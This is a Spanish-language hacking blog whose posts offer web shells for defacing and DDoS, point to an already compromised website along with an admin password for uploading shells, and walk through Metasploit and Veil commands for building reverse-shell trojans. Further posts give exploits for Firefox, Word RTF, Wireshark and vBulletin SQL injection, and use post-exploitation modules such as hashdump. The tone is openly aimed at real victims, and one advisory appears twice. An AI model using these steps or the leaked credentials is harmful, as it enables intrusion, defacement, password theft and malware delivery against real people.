Les dejo dos shell la c99shell 1.0 y b374 2.8 para defacear o hacer un ataque ddos solo agregen sus victimas :) hay que subirla en el servidor de la web hackeada.
Mostrando entradas con la etiqueta Pentesting. Mostrar todas las entradas
Mostrando entradas con la etiqueta Pentesting. Mostrar todas las entradas
Publicado Por
Unknown
//
10:31
//
5 dic 2014
Les dejo dos shell la c99shell 1.0 y b374 2.8 para defacear o hacer un ataque ddos solo agregen sus victimas :) hay que subirla en el servidor de la web hackeada.
Descargar:
Publicado Por
Unknown
//
9:39
//
1 dic 2014
Para subir shell no modifiquen nada -_-
Web
Login Admin
Password: jlcb599516
Etiquetas:
Pentesting
Publicado Por
Unknown
//
12:09
//
15 nov 2014
Aquí les regalo esta web con shell para que suban sus shell booter o lo que quieran, si quieren pueden defacear xD
Autor:12Glitch13
Deface web con shell
http://www.lacoloniadigital.com.uy/noticias/12Glitch13.php
Web original
Etiquetas:
Pentesting
Publicado Por
Unknown
//
17:58
//
14 oct 2014
Fecha: 10/12/2014
CVSS: 7.1 (AV: N / AC: H / Au: S / C: C / I: C / A: C) de base
cwe: 89
proveedor: Soluciones vBulletin
producto: vBulletin 4
Versiones afectadas: últimas 4.x (hasta la fecha); verificado <= 4.2.2
* VBulletin 4.2.2 (verificado)
* VBulletin 4.2.1 (verificado)
* VBulletin 4.2.0 PL2 (verificado)
explotabilidad:
* Explotable de forma remota
* Requiere autenticación (ApiKey)
disponibilidad parche (hasta la fecha): Ninguno
Resumen
vBulletin 4 no limpiar adecuadamente los parámetros para permitir breadcrumbs_create
a un atacante inyectar comandos SQL de su elección (SELECT).
riesgo: más bien bajo - debido al hecho de que es indispensable la clave api
es probable que pueda utilizar CVE-2014-2023 para obtener la clave api
Detalles
componente vulnerable:
./includes/api/4/breadcrumbs_create.php
argumento vulnerables:
conceptid
que se desinfectan TYPE_STRING lo que no impide inyecciones SQL.
1) prerequesites
1.1) enable API, generate API-key
logon to AdminCP
goto "vBulletin API"->"API-Key" and enable the API interface, generate key
2) run PoC
edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
provide WWW_DIR which is the place to write the php_shell to (mysql must have permissions for that folder)
CVSS: 7.1 (AV: N / AC: H / Au: S / C: C / I: C / A: C) de base
cwe: 89
proveedor: Soluciones vBulletin
producto: vBulletin 4
Versiones afectadas: últimas 4.x (hasta la fecha); verificado <= 4.2.2
* VBulletin 4.2.2 (verificado)
* VBulletin 4.2.1 (verificado)
* VBulletin 4.2.0 PL2 (verificado)
explotabilidad:
* Explotable de forma remota
* Requiere autenticación (ApiKey)
disponibilidad parche (hasta la fecha): Ninguno
Resumen
vBulletin 4 no limpiar adecuadamente los parámetros para permitir breadcrumbs_create
a un atacante inyectar comandos SQL de su elección (SELECT).
riesgo: más bien bajo - debido al hecho de que es indispensable la clave api
es probable que pueda utilizar CVE-2014-2023 para obtener la clave api
Detalles
componente vulnerable:
./includes/api/4/breadcrumbs_create.php
argumento vulnerables:
conceptid
que se desinfectan TYPE_STRING lo que no impide inyecciones SQL.
1) prerequesites
1.1) enable API, generate API-key
logon to AdminCP
goto "vBulletin API"->"API-Key" and enable the API interface, generate key
2) run PoC
edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
provide WWW_DIR which is the place to write the php_shell to (mysql must have permissions for that folder)
Nota: no se proporciona meterpreter_bind_tcp
ejecutar PoC, esperar para el éxito! mensaje
Nota: poc desencadenará shell meterpreter
escenario PoC meterpreter requiere que el usuario mysql para tener permisos de escritura
que puede no ser el caso en algunas instalaciones por defecto.
Cronología
01/14/2014: contacto inicial vendedor, ninguna respuesta
24/02/2014: contactos de proveedores terceros, ninguna respuesta
10/13/2014: divulgación pública
https://github.com/tintinweb/pub/blob/master/pocs/cve-2014-2022/poc_cve-2014-2022.py
Etiquetas:
Pentesting
Publicado Por
Unknown
//
10:15
//
20 sept 2014
Lo primero que voy hacer es crear una cuenta de No-Ip para hacer mi ip publica estática no sere muy detallado por que creo que la mayoría conoce lo que es no-ip y su funcionamiento.
-Registrarse en la pagina de no-ip.
-Damos en agregamos host.
-Colocamos el hostname ,en ip address es nuestra ip publica.
-En ADD host para guardar.
-descargar el DUC de no-ip.
-como estoy virtualizando Kali utilizo el duc en windows 7.
-Ahora abrimos veil y configuramos para que sea python meterpreter reverse tcp ,dependiendo de las versiones de veil el número puede cambiar.
-seguimos con la configuración cuando nos toque colocar nuestra ip en set LHOST colocamos nuestro No-ip por ejemplo RhinestoneBluer.no-ip.org .Colocando también nuestro puerto a la escucha como en este caso realizare un ataque wan hay que abrir el puerto 4444 en el router.
y por ultimo solo tecleamos generate.
-Lo siguiente es colocar el nombre y utilizamos Pyinstaller
-Ahora nos vamos a metasploit y configuramos el exploit de handler ,utilizamos un payload de reverse_tcp_dns el dns es importante si el no reconocería nuestro dominio en set LHOST cambia en lugar de poner nuestra ip privada hay que colocar nuestro dominio de no-ip ,el puerto a la escucha es igual que el veil y finalmente lanzamos el exploit.
-Listo una session de meterpreter para meterle persistencia al incauto xD....
Etiquetas:
Pentesting
Publicado Por
Unknown
//
10:29
//
19 jul 2014
Metasploit tiene una amplia gama de módulos de la explotación después de la que se puede ejecutar en los objetivos comprometidos para reunir pruebas, el pivote más en una red de destino, y mucho más.
Primero hay que tener meterpreter en la maquina comprometida ,yo le subo privilegios como system para evitar errores ,colocamos el comando de background para que nos guarde nuestra sesión de meterpreter y retrocedemos con el comando de back para utilizar los post modulos de metasploit.
voy a usar dos post modulos , uno de ellos lo que hace es trasmitir un video de youtube a todos los sistemas que tengo infectados .se podra ver los videos en el navegador predeterminado y con la ventana maximizada , donde dice VID ponemos el id del video.
msf use post/multi/manage/play_youtube
msf exploit (play_youtube)>set VID
msf exploit (play_youtube)>set session 1
msf exploit (play_youtube)>exploit
El segundo nos muestra las aplicaciones que estan instaladas y las vesiones de la pc victima .
msf > use post/windows/gather/enum_applications
msf post(enum_applications) > set session 1
msf post(enum_applications) > exploit
Hay otros post modulos que son de gran ayuda como....
use post/windows/gather/checkvm:
verifica si la pc infectada es una maquina virtual o no.
use post/windows/gather/hashdump:
Mostrara la contraseña del administradoor del sistema.
use post/windows/gather/usb_history
Enumera la historia de la unidad USB.
Etiquetas:
Pentesting,
Tutoriales
Publicado Por
Unknown
//
11:06
//
3 jul 2014
Este exploit dinámicamente crea un archivo de addon XPI.. El bootstrap addon Firefox resultante se presenta a la víctima a través de una página web.
Navegador Firefox de la víctima se abrirá un cuadro de diálogo preguntando si confían en el addon. Una vez que el usuario hace clic en "install", el complemento se instala y ejecuta la carga útil con permisos de usuario. A partir de Firefox 4, esto va a funcionar sin un reinicio como el addon está marcado para ser "bootstrap". A medida que el complemento se ejecutará la carga útil después de cada reinicio Firefox, una opción puede ser dada a desinstalar automáticamente el complemento una vez que la carga ha sido ejecutado. En Firefox 22,0-27,0, CVE-2014-1510 nos permite saltarnos la primera mitad de los permisos con prontitud.
En este caso se obtendra una shell del sistema pero podemos convertir esa shell
en una sesión de meterpreter con varias tecnicas.
Cita:msf use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit (firefox_xpi_bootstrapped_addon)>set payload
firefox/shell_reverse_tcp
msf exploit (firefox_xpi_bootstrapped_addon)>set lhost(IP)
msf exploit (firefox_xpi_bootstrapped_addon)>set uripath /
msf exploit (firefox_xpi_bootstrapped_addon)>exploit
Solo hay que enviar el enlace a la victima,se tendra que instalar el addon para firefox.
Esperamos la conexion y ejecutamos el comnado de sessions para comprobar si llego la shell.
Arrancamos la sesión con el numero de id y listo tenemos una shell del sistema infectado con el comando HELP podemos ver todas las opciones que nos permite realizar en el sistema.
Etiquetas:
Pentesting,
Tutoriales
Publicado Por
Unknown
//
10:01
//
1 jul 2014
En esta ocasión Maligno no tiene que ver con Chema Alonso . Se trata de una herramienta de código abierto de la firma Encripto AS para servir payloads de Metasploit en un test de intrusión. Es decir, genera shellcodes con msfvenom y los transmite por HTTP o HTTPS. Eso sí, el shellcode es cifrado con AES y codificado con Base64 antes de enviarse.
Maligno tiene también una parte cliente para descargar el payload de Metasploit cifrado. Una vez que se recibe el shellcode, el cliente lo descodifica, lo descifra y lo inyecta en la máquina objetivo. Como resultado, obtendremos una sesión de Metasploit evadiendo detecciones...
1.- Instala python-ipcalc (dependencia):
Cita:sudo apt-get update && sudo apt-get install python-ipcalc
2.- Descarga y descomprime Maligno:
Cita:http://www.encripto.no/tools/maligno-1.1.tar.gz
3.- Genera un certificado auto-firmado con el siguiente script:
Cita:./certgen.sh
4.- Configura el servidor Maligno ajustando las opciones en server.conf:
Cita:Echa un vistazo al fichero server.conf.explained
5.- Ejecuta el servidor Maligno:
Cita:python maligno_srv.py
6.- Genera un cliente:
Cita:python clientgen.py -i 0 -f server.conf -o my_client.py
Cita:-i: Índice del payload (payload especificado en el fichero de configuración del server, empezando desde 0)
-f: Fichero de configuración del servidor Maligno
-o: Fichero de salida donde se escribirá el código del cliente
7.- Manejador de Metasploit
Arranca msfconsole con el fichero de recursos generado por Maligno
Cita:msfconsole -r reverse_tcp_192.168.0.2_4444.rc
8.- Empieza a conseguir shells!
Autor:VICENTE MOTOS
Autor:VICENTE MOTOS
Etiquetas:
Informacion,
Pentesting
Publicado Por
Unknown
//
9:30
//
26 jun 2014
Los caballos de diligencia shellcode-less, teatralizadores Meterpreter "puros" en cierto modo similares a los caballos de diligencia reverse_tcp tradicionales.
Reverse_https Meterpreter [s] teatralizadores son en realidad un poco más simple que reverse_tcp. La idea general es la misma: el controlador sirve un archivo dll. Que el cliente luego inyecta mediante el VirtualAlloc / etc. metodología. Sin embargo, en lugar de tener que parchear el. Dll a nosotros mismos con las instrucciones de montaje y el descriptor de fichero de un conector, el manejador de Metasploit parchea el agente de usuario, método de transporte (http / https), url y expiración / tiempo de espera de la comunicación de forma dinámica, ya que sirve el Meterpreter.
Configuramos los parametros la ip atacante y el puerto de escucha
Colocamos un nombre al troyano y nos preguntara como crear el payload la opcion 1 por defecto
Se guardara el troyano en la siguiente ruta /root/veil-output/compiled/Rhinestone.exe
Creamos la sesion de handler pero esta ves utilizando un payload de reverce https
Cita:
msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_httpsmsf exploit(handler) > set ExitOnSession falsemsf exploit(handler) > set LHOST (IP)msf exploit(handler) > set LPORT 3232msf exploit(handler) > exploit -j
Solo hay que pasarle el troyano a la victima y esperar que lo ejecute y tendremos la sesión de meterpreter.

Veil y Armitage
Cortana es un lenguaje de scripting ataque basado en el sueño, ambas escritas por Raphael Mudge. Cortana permite la manipulación avanzada de Armitage , las versiones gratuitas y de pago de un entorno de tipo gui (y más) para Metasploit. (Nota: armitage está disponible gratuitamente en Kali con apt-get install armitage). Con Cortana, puede disparar en eventos específicos o acciones del usuario, interactuar con el backend Metasploit completo, modificar los menús, y mucho más. Hay algunos buenos ejemplos en github de Raffi de lo que usted puede hacer con este potente lenguaje a su alcance.
Velo-Evasion en Armitage utilizando Cortana. Con el fin de obtener la estructura de menú deseado, Armitage (licencia BSD) código de fondo fue despojado de distancia y menús personalizados se construyeron utilizando ejemplos de código existentes de Raffi. Para cargar el guión veil_evasion.cna en Armitage, vaya a Armitage -> Scripts, seleccione el botón Cargar y navegue hasta el guión veil_evasion.cna:
Aparece una nueva pestaña en la parte superior Veil-Evasion, solo nos queda configurar el troyano pero esta vez con un entorno grafico amigable , mi recomendación es aunque armitage es bastante bueno siempre es mejor aprender manualmente cada funcion, pero para la organización de las pcs infectadas es bueno por su sistema grafico de host.
Etiquetas:
Pentesting,
Tutoriales
Publicado Por
Unknown
//
11:28
//
12 jun 2014
En este módulo se crea un archivo RTF malicioso que al abrirse en versiones vulnerables de Microsoft Word dará lugar a la ejecución de código. Existe la falla en la forma de un campo de recuento lista de invalidación puede ser modificada para tratar una estructura como la otra. Este error se consideró inicialmente la explotación en la partida salvaje en abril de 2014. Este módulo fue creado mediante la inversión de una muestra pública malware.
Microsoft Word 2003 Service Pack 3, 2007 SP3, 2010 SP1 y SP2, 2013, y 2013 RT; Word Viewer; Compatibilidad de Office Paquete SP3; Office 2011 para Mac; Word Automation Services en Server 2010 SP1 y SP2 y 2013 de SharePoint; Office Web Apps 2010 SP1 y SP2; y Office Web Apps Server 2013 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (corrupción de memoria) a través de datos RTF artesanales.
Exploit
Cita:CVE-2014-1761
Cita:kali linux
Metasploit
Cita:set payload windows/meterpreter/reverse_tcp
set lhost (IP)exploit
Se crea un archivo (.rtf) malicioso,solo hay que abrirlo en la pc victima.
creamos una conexion de handler para que cuando abramos el archivo (.rtf) se conecte
a la pc atacante,configuramos nuestros parametros.
Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcpset lhost (IP)exploit
Abrimos el archivo ,Esperamos que conecte y nos da la sesión de meterpreter.
Etiquetas:
Pentesting,
Tutoriales
Publicado Por
Unknown
//
11:44
//
10 jun 2014
Este módulo Metasploit provoca un desbordamiento del búfer de pila en las versiones de Wireshark 1.8.12-1.10.5 y por abajo por la generación de un archivo malicioso.
Desbordamiento de búfer en la función mpeg_read en escuchas telefónicas / mpeg.c en el analizador MPEG en Wireshark 1.8.x antes de 1.8.13 y 1.10.x antes 1.10.6 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (caída de aplicación) a través de un gran récord en los datos MPEG.
Exploit
Cita:CVE-2014-2299
Cita:kali linux
Metasploit
Cita:set payload windows/meterpreter/reverse_tcp
set lhost (IP)set target 1exploit
el archivo ,solo hay que abrirlo en la pc victima.
Pero antes hay que crear una conexion de handler para que cuando abramos el archivo (.pcap) se conecte a la pc atacante,configuramos nuestros parametros.
Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcpset lhost 192.168.154.130exploit
Esperamos que conecte y nos da la sesión de meterpreter.
Etiquetas:
Pentesting,
Tutoriales
















































